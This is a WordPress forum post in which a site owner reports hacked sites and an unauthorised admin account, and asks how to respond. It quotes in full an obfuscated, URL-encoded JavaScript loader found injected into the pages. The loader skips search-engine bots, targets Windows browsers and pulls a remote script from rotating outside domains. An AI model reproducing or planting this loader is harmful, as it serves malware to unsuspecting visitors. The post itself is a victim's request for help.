WordPress.org

Forums

Site Security Issue (1 post)

  1. rileywiebe
    Member
    Posted 4 years ago #

    Hi, a couple of sites that are updated to 3.0 seem to be compromised. There have been accounts made on the sites that have admin permission (Username: JohnnyA), and registration is disabled all together. This page has also been displayed by chrome:

    http://faintmedia.com/application/public/templates/faintmedia/i/images/junk/wp-problem.png

    I've also found this javascript at the bottom of the page on one site and in a js file on another.
    var st1 = 0; document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72%63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%69%6F%6E%3B%20%69%66%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%2E%69%6E%64%65%78%4F%66%28%22%77%61%74%63%68%74%69%6D%65%22%29%3D%3D%2D%31%26%26%21%61%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%6D%61%74%63%68%28%62%29%26%26%63%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%77%69%6E%22%29%21%3D%2D%31%29%7B%76%61%72%20%64%3D%5B%22%65%64%69%73%6F%6E%73%6E%69%67%68%74%63%6C%75%62%2E%63%6F%6D%22%2C%22%67%61%69%6E%64%69%72%65%63%74%6F%72%79%2E%6F%72%67%22%2C%22%69%64%65%61%63%6F%72%65%70%6F%72%74%61%6C%2E%63%6F%6D%22%2C%22%6B%61%72%65%6E%65%67%72%65%6E%2E%63%6F%6D%22%5D%2C%65%3D%5B%22%61%71%75%61%2E%22%2C%22%61%7A%75%72%65%2E%22%2C%22%62%6C%61%63%6B%2E%22%2C%22%62%6C%75%65%2E%22%2C%22%62%72%6F%77%6E%2E%22%2C%22%63%68%6F%63%6F%6C%61%74%65%2E%22%2C%22%63%6F%72%61%6C%2E%22%2C%22%63%79%61%6E%2E%22%2C%22%64%61%72%6B%72%65%64%2E%22%2C%22%66%75%63%68%73%69%61%2E%22%2C%22%67%6F%6C%64%2E%22%2C%22%67%72%61%79%2E%22%2C%22%67%72%65%65%6E%2E%22%2C%22%69%6E%64%69%67%6F%2E%22%2C%22%69%76%6F%72%79%2E%22%2C%22%6B%68%61%6B%69%2E%22%2C%22%6C%69%6D%65%2E%22%2C%22%6D%61%67%65%6E%74%61%2E%22%2C%22%6D%61%72%6F%6F%6E%2E%22%2C%22%6E%61%76%79%2E%22%2C%22%6F%6C%69%76%65%2E%22%2C%22%6F%72%61%6E%67%65%2E%22%2C%22%70%69%6E%6B%2E%22%2C%22%70%6C%75%6D%2E%22%2C%22%70%75%72%70%6C%65%2E%22%2C%22%72%65%64%2E%22%2C%22%73%69%6C%76%65%72%2E%22%2C%22%73%6E%6F%77%2E%22%2C%22%76%69%6F%6C%65%74%2E%22%2C%22%77%68%69%74%65%2E%22%2C%22%79%65%6C%6C%6F%77%2E%22%5D%2C%66%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%20%64%2E%6C%65%6E%67%74%68%29%2C%67%3D%4D%61%74%68%2E%66%6C%6F%6F%72%28%4D%61%74%68%2E%72%61%6E%64%6F%6D%28%29%2A%65%2E%6C%65%6E%67%74%68%29%3B%64%74%3D%6E%65%77%20%44%61%74%65%3B%64%74%2E%73%65%74%54%69%6D%65%28%64%74%2E%67%65%74%54%69%6D%65%28%29%2B%39%30%37%32%45%34%29%3B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3D%22%77%61%74%63%68%74%69%6D%65%3D%22%2B%65%73%63%61%70%65%28%22%77%61%74%63%68%74%69%6D%65%22%29%2B%22%3B%65%78%70%69%72%65%73%3D%22%2B%64%74%2E%74%6F%47%4D%54%53%74%72%69%6E%67%28%29%2B%22%3B%70%61%74%68%3D%2F%22%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));

    Anyone else having this problem? Any suggestions about what to do?

    The only other thing I've found about this is here:
    http://weblog.mediatemple.net/weblog/2010/07/02/1378-compromised-sites/

    Any help and advice would be great! Thanks.

Topic Closed

This topic has been closed to new replies.

About this Topic